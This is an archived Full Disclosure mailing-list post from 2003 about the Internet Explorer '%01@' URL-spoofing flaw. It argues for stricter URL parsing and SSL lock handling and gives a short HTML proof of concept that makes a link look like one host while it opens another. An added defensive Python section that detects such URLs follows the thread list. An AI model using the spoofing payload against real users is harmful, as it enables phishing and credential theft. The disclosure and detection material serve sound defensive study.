Full Disclosure mailing list archives
Re: Re: Internet Explorer URL parsing vulnerability
From: "Erik van Straten" <emvs.fd.3FB4D11C () cpo tn tudelft nl>
Date: Fri, 12 Dec 2003 13:49:06 +0100
Hi all,

On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:

> Most reasonable software will put in an outline-box or "\NNN", or other similar indication a glyph is not displayable in the charset in use, and then *continue trying* to render the rest of the string.

I disagree that software should attempt to continue parsing URLs (and *ML code for that matter) after an error or if something unexpected happens. This is asking for lots of new vulns. Instead, everything should come to a halt and a "page" or error box should say "Bad URL syntax".

An IE warning box for "legitimate" use of @ in URLs would be great.

In case of SSL, the lock icon should *immediately* disappear, and an (optional) warning box should pop up, if the hostname in the cert no longer matches *either* the one displayed in the URL combobox *or* the actual underlying connection. Also, it is probably a good idea to have the page turn blank (or have a red cross) as soon as the displayed URL doesn't match the connection (for example if someone starts to manually edit the URL, but eventually does not press enter).

Now for the fun part. Some people have rightfully expressed their concerns whether https://www.betaplace.com actually is a Microsoft site (it is). To confirm, visit https://www.betaplace.microsoft.com ; it works, however currently the certificate is invalid (hostname mismatch).

Here's my tip for Microsoft (acks to Petard :)

Save to file whatever.htm, and open that in MSIE:

-------------- start cut here -------------
<HTML><BODY>

<a href="https://www.betaplace.microsoft.com"
onclick="location.href=unescape(
'https://www.betaplace.microsoft.com%01@www.betaplace.com/betaplace/sign-in/betaplace.asp'
); return false;">
Visit the *REAL* Microsoft's BetaPlace site</a>

</BODY></HTML>
-------------- end cut here -------------

Note: if the line with '' in the middle wraps, unwrap it before saving to the htm file. There shouldn't be any spaces in it. The blank lines in between are okay.

Cheers,
Erik

On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:

> It gets better... it works with SSL sites as well. The little lock, and no warning message: http://petard.freeshell.org/hotmail-pr.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
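The two mitigations Erik argues for above (refuse a URL whose authority contains userinfo plus a control character, and only show the SSL lock when the certificate matches both the host the user sees and the host actually connected to) can be expressed as plain URL checks. The following Python is an added example written for this archive page; it is not code from the original post or from Microsoft, and the sample URLs and certificate names it uses are constructed for illustration.

```python
# Added example (not from the original post): defender-side checks for the
# display/connection mismatch the thread describes, where the text before '@'
# in the URL authority looks like a trusted host while the real host follows
# the '@', optionally hidden behind a percent-encoded control character (%01).
import re
from urllib.parse import urlsplit, unquote

# C0 control characters and DEL have no legitimate place in a URL.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")
# A host-like token: letters, digits, dots and hyphens.
HOST_TOKEN_RE = re.compile(r"[A-Za-z0-9.-]+")


def analyze_url(url):
    """Classify a URL as 'ok', 'warn' (userinfo present, looks legitimate) or
    'reject' (control characters, or an apparent host that differs from the
    host the client would really connect to)."""
    parts = urlsplit(url)
    real_host = (parts.hostname or "").lower()
    userinfo = parts.netloc.rsplit("@", 1)[0] if "@" in parts.netloc else ""
    decoded_userinfo = unquote(userinfo)
    findings = []

    if userinfo:
        findings.append("userinfo present before '@'")
    if CONTROL_RE.search(unquote(parts.netloc)) or CONTROL_RE.search(unquote(parts.path)):
        findings.append("control character after percent-decoding")

    # The host a casual reader sees is the leading host-like token of the
    # authority, which is the userinfo whenever one is present.
    m = HOST_TOKEN_RE.match(decoded_userinfo)
    apparent_host = m.group(0).lower() if m else ""
    if apparent_host and "." in apparent_host and apparent_host != real_host:
        findings.append(f"apparent host {apparent_host!r} differs from real host {real_host!r}")

    if any(f.startswith(("control", "apparent")) for f in findings):
        verdict = "reject"
    elif findings:
        verdict = "warn"
    else:
        verdict = "ok"
    return {"real_host": real_host, "apparent_host": apparent_host,
            "findings": findings, "verdict": verdict}


def cert_name_matches(cert_name, host):
    """Match a certificate DNS name against a host, allowing a single
    leftmost wildcard label (the usual browser rule)."""
    cert_name, host = cert_name.lower(), host.lower()
    if cert_name.startswith("*."):
        return host.endswith(cert_name[1:]) and host.count(".") == cert_name.count(".")
    return cert_name == host


def lock_icon_allowed(url, cert_names):
    """The rule the post describes: the lock is only justified when the
    certificate matches both the host the user sees and the host actually
    connected to, and the URL itself passed the checks above."""
    info = analyze_url(url)
    shown = info["apparent_host"] or info["real_host"]
    return (info["verdict"] != "reject"
            and any(cert_name_matches(n, shown) for n in cert_names)
            and any(cert_name_matches(n, info["real_host"]) for n in cert_names))


if __name__ == "__main__":
    # Constructed samples: the spoofing shape from the thread and a plain URL.
    samples = [
        "https://www.betaplace.microsoft.com%01@www.betaplace.com/betaplace/sign-in/betaplace.asp",
        "https://www.betaplace.com/betaplace/sign-in/betaplace.asp",
    ]
    for u in samples:
        info = analyze_url(u)
        print(info["verdict"], info["real_host"], info["findings"])
```

Run as a script it prints the verdict for each sample; in a gateway or browser extension the same functions would drive the "Bad URL syntax" halt and the lock-icon decision the post asks for.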
Current thread:
- Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability, (continued)
- Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
- RE: Re: Internet Explorer URL parsing vulnerability Funk Jr, Joseph C. (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Jarkko Turkulainen (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability John Sage (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability Erik van Straten (Dec 12)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
- Re: Re: Internet Explorer URL parsing vulnerability Georgi Guninski (Dec 12)